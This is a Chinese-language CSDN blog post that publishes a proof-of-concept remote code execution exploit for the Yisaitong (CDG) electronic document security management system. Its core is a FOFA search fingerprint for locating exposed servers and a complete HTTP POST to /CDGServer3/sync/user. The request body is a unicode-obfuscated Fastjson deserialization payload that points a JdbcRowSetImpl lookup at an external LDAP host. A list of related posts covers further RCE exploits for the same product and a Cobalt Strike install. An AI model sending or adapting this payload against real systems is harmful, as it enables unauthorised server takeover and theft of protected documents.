亿赛通电子文档安全管理系统 user RCE

最新推荐文章于 2024-08-28 17:21:03 发布
最新推荐文章于 2024-08-28 17:21:03 发布
阅读量285 收藏
点赞数 1
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/135860733
版权

漏洞描述

网络资产测绘

body=“CDGServer3”

在这里插入图片描述

Poc
POST /CDGServer3/sync/user HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Content-Length: 681
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/json

{
"atelzxbfu4": {
"\x40\u0074\u0079\u0070\u0065":
"java.\u006C\u0061\u006E\u0067.\u0043\u006C\u0061\u0073\u0073",
"val":
"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u007
4\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u007
0\u006C"
},
"z6uuqdm6qxvoctsexepw": {
"\x40\u0074\u0079\u0070\u0065":
"\u0063\u006F\u006D\u002E\u0073\u0075\u006E\u002E\u0072\u006F\u0077\u0073\u0065\u007
4\u002E\u004A\u0064\u0062\u0063\u0052\u006F\u0077\u0053\u0065\u0074\u0049\u006D\u007
0\u006C",
"d_a_t_a_S_o_u_r_c_e_Na_m_e":
"\u006C\u0064\u0061\u0070\u003A\u002F\u002Fzohismespc.dgrh3.cn",
"au_to_Co_mm_i_t": true
}
}

判定结果

image.png
image.png

qq_36334672
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
亿赛通电子文档安全管理系统 RCE漏洞复现(QVD-2023-19262)
0xSec
08-19 3763
亿赛通电子文档安全管理系统/solr/flow/dataimport接口处存在远程代码执行漏洞,未经授权的攻击者可过此漏洞执行任意指令,从而获取服务器权限。
某赛通电子文档安全管理系统 RCE(QVD-2023-19262)
weixin_43567873的博客
03-20 58
某赛通电子文档安全管理系统 RCE(QVD-2023-19262)
亿赛通电子文档安全管理系统 XStream反序列化 RCE
qq_36334672的博客
01-26 575
【代码】亿赛通电子文档安全管理系统 XStream反序列化 RCE
centos云服务器安装cs(cobaltstrike4
2401_84253380的博客
04-26 334
wget https://repo.huaweicloud.com/java/jdk/8u201-b09/jdk-8u201-linux-x64.tar.gz #下载jdk压缩包tar -zxvf jdk-8u201-linux-x64.tar.gz #解压解压完之后生成一个jdk1.8.0_201文件mv jdk1.8.0_201 /usr/local/jdk1.8/ #把jdk1.8.0_201文件移动到usr/local/jdk1.8/目录下配置环境变量。
Goby 漏洞发布|亿赛通电子文档安全管理系统 PrintLimitApp 接口远程代码执行漏洞(1)
2401_84301315的博客
05-07 649
亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全
某赛通电子文档安全管理系统XStream反序列化RCE
weixin_43567873的博客
03-07 278
某赛通电子文档安全管理系统XStream反序列化RCE
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
07-01
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期...
亿赛通电子文档安全管理系统-rce-exp.zip
06-23
2、本项目适合计算机相关专业(如计科、人工智能、信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。...
亿赛通电子文档安全管理系统V5.0--系统安装手册.docx
01-16
亿赛通电子文档安全管理系统V5.0--系统安装手册.docx
亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口存在任意文件上传漏洞 附POC
nnn2188185的博客
11-23 392
亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口存在任意文件上传漏洞 附POC
亿赛通电子文档安全管理系统dataimport远程命令执行漏洞
chaojixiaojingang
08-06 7607
1.漏洞描述 亿赛通电子文档安全管理系统dataimport存在远程命令执行漏洞,攻击者过构造特定的请求可执行任意命令。 2.网络资产查找 FOFA:title="电子文档安全管理系统" 3.POC import requests import sys import random import re import base64 import time from requests.packages.urllib3.exceptions import InsecureRequest...
第135天:内网安全-横向移动&非约束委派&约束委派&数据库攻防
weixin_71529930的博客
08-24 513
非约束委派存在不安全性,所以微软在Windows server 2003中引入了约束委派,约束委派攻击主要利用被控主机设置了域控的CIFS服务的约束委派,则攻击者可以先使用S4u2seflt申请域管用户访问被控主机的ST1,然后使用S4u2Proxy以administrator身份访问域控的CIFS服务,即相当于控制了域控。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管。利用该身份就可以访问域控,记得用主机名去访问。(域控)访问具有非约束委派权限的机器。
终端防火墙软件功能 | 在终端设备上启用防火墙!终端安全小课堂开讲啦
2401_86434954的博客
08-24 459
终端设备的安全性直接关系到企业的整体网络安全,随着网络威胁的日益复杂和多样化,启用并合理配置终端防火墙软件是保障终端安全不可或缺的一环。今天,我们将走进终端安全小课堂,详细解析中的防火墙功能,为您揭开其保护终端安全的神秘面纱。
医院建筑的电气设计——保障医疗质量与安全的坚固基石
acrel002的博客
08-28 241
特别是那些与患者生命息息相关的1、2类场所,如急诊抢救室、手术室、重症监护室等,其供电系统更是被赋予了“特别重要负荷”的标签,要求在极短的时间内恢复供电,以确保医疗活动的连续性和患者的安全。随着一批批新建医院及既有医院的华丽蜕变,从社区医院到综合医院,再到医疗城、医疗集聚区的崛起,不仅彰显了政府对民生健康的深切关怀,也预示着我国医疗体系正迈向智能化、高效化的新时代。医院,作为生命与健康的守护者,其内部布满了各式各样的精密医疗设备与电子仪器,这些设备的稳定运行高度依赖于稳定、可靠的电力供应。
《云原生安全攻防》-- K8s攻击案例:组件未授权访问导致集群入侵
08-27 256
在本节课程中,我们将一起探讨K8s组件未授权访问导致集群入侵的攻击案例。K8s的组件的配置不安全,就有可能存在未授权访问的安全风险。如果攻击者能够成功进行未授权访问,就有可能导致整个集群节点遭受入侵。在这个课程中,我们将学习以下内容:K8s组件未授权访问:常见的K8s组件未授权访问漏洞介绍。K8s组件未授权攻击案例:深入分析K8s组件未授权访问的攻击案例。我们将重点介绍以下几个常见的组件未授权访问...
掌控安全CTF-2024年8月擂台赛-ez_misc
最新发布
ASD830的博客
08-28 144
用得到的密码(the_password_is_zkaq!)去解密 最后的秘密.zip 压缩包,可以得到一个key.txt和一个加密的flag.zip。这里我们没啥信息可用的了,返回去看看 最后的秘密.zip 压缩包有注释(我最喜欢和超人一起下棋了,哈哈哈哈哈哈!发现需要密钥,超人超人,猜测为“superman”,解密成功得到新的key:s1mple。找到了往大千世界的旗帜,请提交你的旗帜,然后继续环游世界吧!我们就可以猜测为棋盘解密,找个解密网站(再往下我们又会找到rsa.txt。
“北京地铁系统中人脸识别技术的安全与效率问题研究”
matlabgoodboy的博客
08-28 270
综上所述,北京地铁系统中人脸识别技术的应用在提高安检和售检票效率方面具有显著优势,但同时也面临着数据隐私保护和滥用风险等安全问题。为了充分发挥人脸识别技术的优势并降低其风险,需要建立健全的法律法规和监管机制,并不断优化技术算法和管理手段。
Metasploit漏洞利用系列(十):MSF渗透测试 - 震网三代(远程快捷方式漏洞)实战
2402_86373248的博客
08-24 716
在本系列的第十篇中,我们将深入探讨如何利用Metasploit Framework (MSF) 来利用著名的震网三代(Stuxnet三代)中的一个远程快捷方式漏洞(LNK漏洞)。虽然“震网三代”并非官方术语,而是为了描述一个类似震网蠕虫的高级威胁,但我们将以此为背景,探索利用Windows快捷方式(LNK)文件的漏洞进行渗透测试的技术细节。漏洞描述:想象一个虚构的场景,其中存在一个类似于CVE-2017-8464的LNK漏洞,允许攻击者过恶意快捷方式文件在受害者计算机上执行任意代码,无需用户交互。
亿赛通电子文档如何保存不加密的文件
06-08
亿赛通电子文档可以过以下步骤保存不加密的文件: 1. 打开亿赛通电子文档软件。 2. 在软件界面中选择要保存的文件。 3. 点击“另存为”按钮。 4. 在弹出的对话框中选择保存路径和文件名。 5. 在“保存类型”选项中选择“普文档”。 6. 点击“保存”按钮即可保存不加密的文件。 请注意,如果您需要保护文档安全性,建议您选择加密保存,以防止未经授权的访问和修改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值